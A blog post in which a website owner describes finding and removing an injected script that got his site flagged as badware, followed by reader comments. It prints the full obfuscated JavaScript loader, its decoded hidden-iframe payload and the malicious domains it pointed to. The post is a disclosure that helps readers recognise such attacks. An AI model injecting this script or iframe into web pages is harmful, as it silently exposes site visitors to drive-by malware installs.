Help needed – Part 2
First, I would like to thank you all for the precious help you gave me with your comments.
Finally, after hours spent dancing naked to the bone in the streets invoking for Manitu, and even more hours trying to explain the police why I was dancing naked, I found the problem.
Somewhere around the site there was this script
1 | $="%6fp%3d%22%2524%253d%2522dw(d%2563%2573(cu%252c1%2534)%2529;%2522;%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;ca%3d%22%2566u%256ect%2569on %2564cs%2528%2564%2573,e%2573){%2564s%253dun%2565sca%2570e%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22%253dst%252bSt%2572ing%252efro%256dCh%2561%2572Cod%2565%2528(t%256dp.c%2568a%25%22;cz%3d%22%2566unc%2574io%256e%2520%2563z%2528%2563z)%257bret%2575%2572n%2520c%2561%252bcb+%2563c%252bcd+%2563%2565+cz%253b};%22;st%3d%22%2573%2574%253d%2522%2524%253ds%2574;%2564%2563s%2528%2564%2561%252b%2564b%252b%2564c%252bd%2564+%2564%2565%252c%25310%2529;%2564w%2528s%2574%2529%253b%2573%2574%253d%2524;%2522;%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;ce%3d%2272Co%2564e%2541t%2528%2530)%255e%2528%25270x%2530%2530%2527+es)%2529%2529;}%257d%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;cb%3d%22%2528ds)%253bst%253dtm%2570%253d%2527%2527;for%2528%2569%253d0;%2569%253cds.l%256%22;cc%3d%225%256egt%2568;%2569+%252b)%257btmp%253dd%2573.sl%2569ce(%2569,i+%2531);s%2574%22;dz%3d%22%2566%2575nct%2569o%256e %2564w(t%2529{ca%253d%2527%252564%25256%2566c%252575m%2565n%252574%2525%2532e%252577%2572%2525%25369te%252528%2525%2532%2532%2527;c%2565%253d%2527%252522)%2527;cb%253d%2527%25253csc%252572%252569%252570t%2525%25320l%2561n%252567%2575%2561%25256%2537e%25253d%25255c%252522jav%2561%2573c%2572%252569p%252574%25255c%252522%25253%2565%2527;cc%253d%2527%25253c%25255c%25252fs%252563rip%252574%25253e%2527;%2565v%2561%256c(un%2565s%2563ape%2528t))%257d;%22;%69%66 (d%6f%63u%6dent%2ecoo%6bi%65.in%64ex%4ff(%27r%665f%36%64s%27%29%3d%3d-1){%73c(%27rf%35%66%36%64%73%27,2,%37);e%76al%28%75%6eesc%61p%65(dz%2b%63z%2bo%70+st%29+%27dw(%64%7a+%63z($%2bst)%29;%27)}el%73e%7b%24%3d%27%27};functio%6e %73c%28cnm%2cv,e%64){v%61r %65x%64%3dnew Da%74e(%29;ex%64.s%65tD%61te%28ex%64.g%65%74Da%74%65()%2be%64%29%3bdo%63u%6den%74.c%6foki%65%3dc%6em%2b%20%27%3d%27 +e%73c%61pe%28v%29+%27;e%78pi%72%65s%3d%27+exd.t%6fGM%54%53%74ri%6e%67(%29%3b};";eval(unescape($));document.write($); |
That once evaluated returns
1 | <div style="visibility:hidden"><iframe src="http://ewbyuno.com/ld/grb/" width=100 height=80></iframe></div> |
This page redirects to http://ewbyuno.com/cgi-bin/in.cgi?p=grobin that sometimes tries to install a component called “dexplore.exe”, otherwise redirects to google.com
The funny thing is that when I googled for ewbyuno I found only two results
The domain is registered to Prokofyev Yaroslav, and the site is hosted on a server owned by SoftLayer Technologies Inc. This company even has a “page” on Wikipedia…
On the same server there are 17 domains… and guess the names? ang2uno.com, bevjuno.com… owned of course by Prokofyev
So this company seems to have a server dedicated to badware diffusion. I emailed them this message:
Hello,
my name is Emanuele Feronato and I recently discovered that one of your servers is hosting domains called ang2uno.com, bevjuno.com, ewbyuno.com (and so on) that are distributing badware after someone injects in various blog and forums hidden javascripts to call your pages from remote servers, with iframes pointing at (as example) http://ewbyuno.com/ld/grb/One of my sites, emanueleferonato.com, was a “victim” of this process and now google flags it as a site that may harm your computer.
I would like to know if you are informed about it and how do you think to manage this problem.
Obviuosly I am going to explain to google and stopbadware.org what happened because I don’t want my site to be flagged as badware when the threat comes from your servers.
About half of my traffic comes (came?) from Google and should it take too long to remove the badware flag I may consider legal actions.
Regards,
Emanuele Feronato
Let’s see what happens.
Now, I want to thank you for feedback and support and I apologize for any virus, trojan and badware you got from this site.
See you soon, I have some tutorials to write.
Obviously, now the site is clean.
(No Ratings Yet)
Loading ...
This post has 19 comments
Paulo Moreira
Hope everything gets sorted now! I followed what happen to you and I imagine that this situation put you in lots of stress. Hope that flag from google disappears because your posts are wicked! I like the way you explain the technical and the business part.You rock, mate!
Yaig
Hi,
I would be curios, how the script got in your sites code in the first place?!
(In order, not to happen again.)
Regards,
yaig
Endre
Hello.
Have you figured out how your site got infected in the first place?
Endre
PS: Greate site by the way!
Lachy
Hey,
I had a game idea and i wanted to know if you could help me out a tad ;) My email is in the wordpress admin :)
Thanks
robby
yep, I really hope this gets resolved Emanuele, and hopefully google will remove flagged status on your website. Keep us posted.
:]
Monkios
I’m really glad this has been found.
Hoping to see you continue.
Fetz
I think that this site can answers all your question:
“Finjan Uncovers Insidious New Variant of Crimeware Toolkit
Infecting More Than 10,000 US Websites in December
In its just-released Malicious Page of the Month report, Finjan explores the “random js toolkit”
http://www.finjan.com/Pressrelease.aspx?id=1820&PressLan=1819&lan=3
emanuel
good luck cool u sove it
Frederik J
That’s good news. :-)
I stay tuned!
Shiv
Hi emanuele,
Great that you started finally to mend those badwares. But as much as I know, that fool of
bevjuno will even answer your mail .
Anyways, the world stands on hope.
Hawdon
Im sorry to say but when I googeld this site up the “this site might harm you” text is still there… Just saying…
Gonzalo
OMG.
I hope they delete the badware, in any case you can make legal actions saying they lowered your page visits, just by showing them the logs
Dog Gon Mad
Hey you were unflaged at around 3:00 this morning. and also thankyou for the great tutorials.
-DGM
Dog Gon Mad
opps, 3:00 GMT-07:00
Josh
Hey im making a birds eye view shooter and i am haveing troubles with arrange movieclips i bring in with actionscript. How do you attach movieclip and arrange it to back? I searched google but i couldnt find anything.
i would appreciate the help.
Ed
Josh you want to look up Depths.
Dog Gon Mad
Hey Emanuele, Google has up another part of the site,Experiment: monetizing a Flash game : Emanuele Feronato – italian …
Also thankyou for your tuts they have really helped me.
-DGM
Emanuele Feronato
I know, the entire process of removing the ad may take up to some weeks.
Brecheen
Hi, this is really nice post i like it so much
thank very much